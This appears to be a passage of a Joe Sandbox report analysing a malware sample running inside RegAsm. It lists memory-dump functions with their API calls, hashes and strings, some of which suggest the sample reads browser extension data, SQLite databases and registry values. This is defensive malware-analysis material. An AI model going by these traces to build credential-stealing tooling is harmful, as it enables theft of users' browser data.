Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strlen$QueryVirtual
String ID: @
API String ID: 3099930812-2766056989
Opcode ID: b4548a7c55d638266e0508bb0abe080468fb6bf61126806d7a12c96a6de38829
Instruction ID: 466afe4c3685285f2ebe0489a4595054022d0f09b2a7b9cf482a5e365b85556b
Opcode Fuzzy Hash: b4548a7c55d638266e0508bb0abe080468fb6bf61126806d7a12c96a6de38829
Instruction Fuzzy Hash: 36416971A00109AFEF24DE90CD45AEF7BB6EB98354F14803AF901B2190D7798E54DBA8

Function 004114EE Relevance: 10.6, APIs: 7, Instructions: 119stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004114F3
strtok_s.MSVCRT ref: 0041151E
StrCmpCA.SHLWAPI(00000000,0042655C,00000001,?,?,?,00000000), ref: 00411561
StrCmpCA.SHLWAPI(00000000,00426558,00000001,?,?,?,00000000), ref: 0041158F
StrCmpCA.SHLWAPI(00000000,00426554,00000001,?,?,?,00000000), ref: 004115B4
StrCmpCA.SHLWAPI(00000000,00426550,00000001,?,?,?,00000000), ref: 004115E5
strtok_s.MSVCRT ref: 0041161B

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: strtok_s$H_prolog
String ID:
API String ID: 1158113254-0
Opcode ID: e553d5132b9e7f86e8479414b2ec2d2c5e35635a680dc74e7bbc93f944b43b53
Instruction ID: 68ea9c5229acb73eb4f6ce9ce1e3a2e95253cdc2d87cf327e38e290520796c14
Opcode Fuzzy Hash: e553d5132b9e7f86e8479414b2ec2d2c5e35635a680dc74e7bbc93f944b43b53
Instruction Fuzzy Hash: 4B41AF70A00106EBDB14CF64DD81BEAB7E8BB58315F10052FE206E66A1DB3CCA858B59

Function 192E31F0 Relevance: 9.5, APIs: 6, Instructions: 466COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a95a9911d26c2af0ac0563f6c52fd90b6cdb4d8944f7990d09e959ec531a919b
Instruction ID: 68b74a32d509e2cb380947aab30fde54fd75b19e5cf5e290b5453de5546a37af
Opcode Fuzzy Hash: a95a9911d26c2af0ac0563f6c52fd90b6cdb4d8944f7990d09e959ec531a919b
Instruction Fuzzy Hash: 60F10671A043429FD705CF24D9C076ABBE0BF44326FA8466DE8999B381D336E945CB91

Function 19264E00 Relevance: 9.2, APIs: 6, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf62777d916ca599ce2a1384be48d3f76f0f81643aba39e377444b175a2cf5c2
Instruction ID: 456beedc0b9a634ca044933d5f87fd9c2aca5d14065c016282d3f9825227aa00
Opcode Fuzzy Hash: cf62777d916ca599ce2a1384be48d3f76f0f81643aba39e377444b175a2cf5c2
Instruction Fuzzy Hash: 1581BC71A043918BE700DF28D984B5A77E4FF84719F580629FD88973A1D736E588CBA3

Function 00415CA5 Relevance: 9.1, APIs: 6, Instructions: 128registrystringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00415CAA
memset.MSVCRT ref: 00415CD6
RegOpenKeyExA.ADVAPI32(80000001,00000000,00020119,?,?,?,00000000), ref: 00415CF3
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF,?,?,00000000), ref: 00415D13
lstrcat.KERNEL32(?,?), ref: 00415D42
lstrcat.KERNEL32(?), ref: 00415D55

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$H_prologOpenQueryValuememset
String ID:
API String ID: 2333602472-0
Opcode ID: 5908ee0a41c72f3eb61dbe54366e8acb213d08ed70dfc70b307fc866011581ad
Instruction ID: b1237888a7669b0395c9cdb9a6d9471705cae356a33a5f6a680b3cc5b253afb1
Opcode Fuzzy Hash: 5908ee0a41c72f3eb61dbe54366e8acb213d08ed70dfc70b307fc866011581ad
Instruction Fuzzy Hash: 8F419DB1D4021DABCF10EFA0DC86EDD7B7DAF18344F00456AB618A2191E7399A858BD2

Function 193673E0 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 369COMMON

Download Yara Rule

Strings

sqlite_master, xrefs: 193673FD
sqlite_temp_master, xrefs: 193673F2
SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 1936776D
ase, xrefs: 1936768D

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master
API String ID: 0-231581592
Opcode ID: 4428cfed609ec073a16290e9aa5f7401081e326d4fd142764b8def3dbc4cab3c
Instruction ID: 9497dc7f6c6f31639e0fae6733cf720ddf86c38893d796074596acd73e3641a1
Opcode Fuzzy Hash: 4428cfed609ec073a16290e9aa5f7401081e326d4fd142764b8def3dbc4cab3c
Instruction Fuzzy Hash: EEE1F9B0A043419FE712CF24C881B5ABBF4BF55304F48865CF94A972A5F771EA44CB92

Function 19256DA0 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 364COMMON

Download Yara Rule

Strings

recursively defined fts5 content table, xrefs: 19256DE2

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: recursively defined fts5 content table
API String ID: 0-437020801
Opcode ID: 13d630d34a3ad1e449bb8f5d86f7adb2375208b7b0261c3ee8c4af6f88731432
Instruction ID: 986abf0d14d90806ec4ed010fb7f13a7256981c122def38aee1d7b7d33a1717d
Opcode Fuzzy Hash: 13d630d34a3ad1e449bb8f5d86f7adb2375208b7b0261c3ee8c4af6f88731432
Instruction Fuzzy Hash: F3D11571905342CFEB14CF19D580797BBE4FF88324F584A5EE88A8B281D775E885CB92

Function 0041ABF7 Relevance: 9.1, APIs: 6, Instructions: 98COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 0041AC05

Part of subcall function 004195E3: __mtinitlocknum.LIBCMT ref: 004195F9
Part of subcall function 004195E3: __amsg_exit.LIBCMT ref: 00419605
Part of subcall function 004195E3: EnterCriticalSection.KERNEL32(00000000,00000000,?,0041A251,0000000D,?,?,0041A6A5,00419142,?,?,0041824B,00000000,0042C9F8,00418292,?), ref: 0041960D

DecodePointer.KERNEL32(0042C980,00000020,0041AD48,00000000,00000001,00000000,?,0041AD6A,000000FF,?,0041960A,00000011,00000000,?,0041A251,0000000D), ref: 0041AC41
DecodePointer.KERNEL32(?,0041AD6A,000000FF,?,0041960A,00000011,00000000,?,0041A251,0000000D,?,?,0041A6A5,00419142), ref: 0041AC52

Part of subcall function 0041A1CA: EncodePointer.KERNEL32(00000000,0041DD9C,00640400,00000314,00000000,?,?,?,?,?,0041AF5F,00640400,Microsoft Visual C++ Runtime Library,00012010), ref: 0041A1CC

DecodePointer.KERNEL32(-00000004,?,0041AD6A,000000FF,?,0041960A,00000011,00000000,?,0041A251,0000000D,?,?,0041A6A5,00419142), ref: 0041AC78
DecodePointer.KERNEL32(?,0041AD6A,000000FF,?,0041960A,00000011,00000000,?,0041A251,0000000D,?,?,0041A6A5,00419142), ref: 0041AC8B
DecodePointer.KERNEL32(?,0041AD6A,000000FF,?,0041960A,00000011,00000000,?,0041A251,0000000D,?,?,0041A6A5,00419142), ref: 0041AC95

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2005412495-0
Opcode ID: d7ad628aa87005de7c3c7305d2a7bf923df02bab6eba3eea3596c736fd1a85c2
Instruction ID: 866b8844d8e5b8d57225da22a5ccbab491dc0a31e53e9c00afc6c61dc2336f58
Opcode Fuzzy Hash: d7ad628aa87005de7c3c7305d2a7bf923df02bab6eba3eea3596c736fd1a85c2
Instruction Fuzzy Hash: 1D316A70A0131ADFDF009FA5D9446EDBAF2BB08314F10402BE510A6251EBBC48E1DF9A

Function 004199D0 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 004199DC

Part of subcall function 0041A334: __getptd_noexit.LIBCMT ref: 0041A337
Part of subcall function 0041A334: __amsg_exit.LIBCMT ref: 0041A344

__amsg_exit.LIBCMT ref: 004199FC
__lock.LIBCMT ref: 00419A0C
InterlockedDecrement.KERNEL32(?), ref: 00419A29
_free.LIBCMT ref: 00419A3C
InterlockedIncrement.KERNEL32(0042E1C0), ref: 00419A54

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: ac75dccc9862243d3894af82c885cdd0114590ba7072444d40fda745b9b04db5
Instruction ID: 9ead1597205a3020cd5d639c693f1539bb4abe548d641bb369b887a3e6c23b68
Opcode Fuzzy Hash: ac75dccc9862243d3894af82c885cdd0114590ba7072444d40fda745b9b04db5
Instruction Fuzzy Hash: C201A131A01652BBDB21AB6694297DE7760AF00764F48401BF800A7691D73C5DC6CBDD

Function 1933ABF0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 204COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1933AE0E
unable to delete/modify user-function due to active statements, xrefs: 1933AD61
misuse, xrefs: 1933AE18
%s at line %d of [%.10s], xrefs: 1933AE1D

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify user-function due to active statements
API String ID: 0-3864549341
Opcode ID: ccc42d511bda3b5a5f612998613e859874a15a170ed4ce62433630382cc7b2b1
Instruction ID: 41a4ea0df0c8887e28cadeb2329687f66393c49238565cff154cbbc84002e9d6
Opcode Fuzzy Hash: ccc42d511bda3b5a5f612998613e859874a15a170ed4ce62433630382cc7b2b1
Instruction Fuzzy Hash: 88510576A44340AFD710CE25DC80B6FB7F8EF89356F484A2DF586D6291D332DA028B52

Function 0040B1E0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 186stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040B1E5

Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980

Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221

Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB

Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A

Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00425F30,00425C3B), ref: 0040B2A6
lstrlenA.KERNEL32(00000000), ref: 0040B2C2

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 0040AFAF: _EH_prolog.MSVCRT ref: 0040AFB4

Strings

^userContextId=4294967295, xrefs: 0040B30D
moz-extension+++, xrefs: 0040B2E8

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 2813378046-3310892237
Opcode ID: d82d09ade0ba0a4835b3956aae4a2697323b81754fe74cb71676ab1b26c84f39
Instruction ID: bb3a9efdf4450b2767142494be26f7b0dc10ed47a6f8b455ca68a0d11c56a3c9
Opcode Fuzzy Hash: d82d09ade0ba0a4835b3956aae4a2697323b81754fe74cb71676ab1b26c84f39
Instruction Fuzzy Hash: B2715C70905288AADB14FBE5D916BDDBBB4AF19308F50417EE805736C2DB78170CCBA6

Function 1924A860 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 180COMMON

Download Yara Rule

Strings

stmt-pointer, xrefs: 1924A928
tables_used, xrefs: 1924A973, 1924A97B
bytecode, xrefs: 1924A96E
argument to %s() is not a valid SQL statement, xrefs: 1924A97C

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: argument to %s() is not a valid SQL statement$bytecode$stmt-pointer$tables_used
API String ID: 0-361449301
Opcode ID: 7b4732275245fcdd414392d87c4f2a0a6999174d963eb0857435def8628c4ae6
Instruction ID: fbeafe9b49a4584a8eb31f7af6edb7403d46a3732d5eb88f39d618309ab1407e
Opcode Fuzzy Hash: 7b4732275245fcdd414392d87c4f2a0a6999174d963eb0857435def8628c4ae6
Instruction Fuzzy Hash: 6661D3725007829FEF18CF24C98675777F4EF04304F29492DE9868B681E776E948CBA2

Function 1935BF00 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 156COMMON

Download Yara Rule

Strings

fts5 expression tree is too large (maximum depth %d), xrefs: 1935C070
fts5: %s queries are not supported (detail!=full), xrefs: 1935C043
NEAR, xrefs: 1935C03A
phrase, xrefs: 1935C035, 1935C042

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: NEAR$fts5 expression tree is too large (maximum depth %d)$fts5: %s queries are not supported (detail!=full)$phrase
API String ID: 0-593389478
Opcode ID: f12dc124acdda16d0425aec951e32318ee40f7f9894922864ca299bd5b36fe8c
Instruction ID: ef6869460a1021355eae8000bacf66c6b3906dd66137dc133a1a3add214c9ff9
Opcode Fuzzy Hash: f12dc124acdda16d0425aec951e32318ee40f7f9894922864ca299bd5b36fe8c
Instruction Fuzzy Hash: 9841B031E002169FE718CE24C880F5AB3B4EF89768F19876DE8478B291E775E845CF91

Function 1927F490 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1927F4B0
unable to delete/modify collation sequence due to active statements, xrefs: 1927F533
misuse, xrefs: 1927F4BA
%s at line %d of [%.10s], xrefs: 1927F4BF

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

